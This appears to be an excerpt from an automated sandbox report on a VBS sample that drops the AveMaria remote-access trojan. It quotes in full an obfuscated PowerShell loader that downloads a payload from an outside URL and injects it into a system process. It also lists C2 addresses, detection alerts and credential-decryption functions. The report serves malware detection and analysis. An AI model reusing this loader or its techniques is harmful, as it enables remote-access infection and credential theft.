2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAy
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs", ProcessId: 7540, ProcessName: wscript.exe
              Source: Registry Key setAuthor: frack113: Data: Details: 10, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 6992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAy
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gW
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:16.346506+020020204231Exploit Kit Activity Detected162.159.140.237443192.168.2.1049703TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:16.347330+020020204241Exploit Kit Activity Detected162.159.140.237443192.168.2.1049703TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:16.346506+020020204251Exploit Kit Activity Detected162.159.140.237443192.168.2.1049703TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:19.191606+020028390891Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:38.752603+020028390871Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:22.453000+020028390881Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:38.752895+020028514501Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:18.968471+020028523471Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:19.191606+020028523521Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:18.751952+020028523461Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:19.190136+020028523501Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:22.453000+020028523511Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:38.752603+020028523481Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              2024-10-02T05:24:18.755283+020028523481Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              2024-10-02T05:24:58.769522+020028523481Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:38.752895+020028523491Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              2024-10-02T05:24:18.755920+020028523491Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              2024-10-02T05:24:58.770155+020028523491Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:19.398141+020028523541Malware Command and Control Activity Detected109.248.151.1562048192.168.2.1049704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T05:23:19.191606+020028523551Malware Command and Control Activity Detected192.168.2.1049704109.248.151.1562048TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AveMaria {"C2 url": "109.248.151.156", "port": 2048, "Proxy Port": 5000, "Builder Id": "D6PX8E9W60"}
              Source: pub-26ee9be236b54d0cb1b570a203543b93.r2.devVirustotal: Detection: 15%Perma Link
              Source: https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/onye.txtVirustotal: Detection: 16%Perma Link
              Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVirustotal: Detection: 10%Perma Link
              Source: http://pub-26ee9be236b54d0cb1b570a203543b93.r2.devVirustotal: Detection: 15%Perma Link
              Source: 89SkYNNpdi.vbsVirustotal: Detection: 11%Perma Link
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,5_2_0040A8C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,5_2_0040C261
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,5_2_0040C3B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,5_2_0040C419
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,5_2_00409D97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,5_2_0040C6BD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD28C58 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,5_2_6CD28C58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD0E460 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PR_Lock,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSlot,5_2_6CD0E460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCF8411 PK11_ExportEncryptedPrivKeyInfo,PORT_NewArena_Util,PORT_ArenaZAlloc_Util,PK11_AlgtagToMechanism,PK11_DoesMechanism,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_FreeSymKey,PORT_ArenaAlloc_Util,SECOID_CopyAlgorithmID_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,SECKEY_DestroyPrivateKey,SECOID_DestroyAlgorithmID_Util,PORT_FreeArena_Util,PORT_SetError_Util,5_2_6CCF8411
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD266EA SEC_PKCS7ContentIsEncrypted,5_2_6CD266EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCF8693 PK11_FindKeyByAnyCert,PK11_ExportEncryptedPrivKeyInfo,SECKEY_DestroyPrivateKey,5_2_6CCF8693
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD2427F SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaZAlloc_Util,PORT_ArenaRelease_Util,PORT_SetError_Util,PORT_SetError_Util,SEC_PKCS7DestroyContentInfo,PORT_ArenaRelease_Util,PT_FPrintStats,5_2_6CD2427F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD0E262 PK11SDR_Decrypt,PORT_NewArena_Util,memset,SEC_QuickDERDecodeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_GetNextSymKey,PK11_GetNextSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_FreeSlot,SECITEM_ZfreeItem_Util,5_2_6CD0E262
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD23DCD PORT_ArenaMark_Util,PORT_ArenaRelease_Util,PORT_SetError_Util,PORT_ArenaZAlloc_Util,PORT_SetError_Util,PORT_ArenaRelease_Util,PK11_IsInternal,PK11_GetInternalKeySlot,PK11_ReferenceSlot,PK11_FreeSlot,PORT_ArenaZAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,PT_FPrintStats,5_2_6CD23DCD
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.10:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.10:49703 version: TLS 1.2
              Source: Binary string: vcruntime140.i386.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2645142075.0000000073BD1000.00000020.00000001.01000000.00000007.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.5.dr
              Source: Binary string: vcruntime140.i386.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.2645142075.0000000073BD1000.00000020.00000001.01000000.00000007.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2642667288.000000007024F000.00000002.00000001.01000000.0000000B.sdmp, freebl3.dll.5.dr
              Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000005.00000002.2628713134.0000000003613000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.2644081524.00000000702D1000.00000020.00000001.01000000.00000006.sdmp, AddInProcess32.exe, 00000005.00000002.2627316202.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr
              Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: AddInProcess32.exe, 00000005.00000002.2644081524.00000000702D1000.00000020.00000001.01000000.00000006.sdmp, AddInProcess32.exe, 00000005.00000002.2627316202.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr
              Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000005.00000002.2628713134.0000000003613000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2643512971.00000000702B9000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1443666553.000001B2BB240000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B3B23000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2643512971.00000000702B9000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr
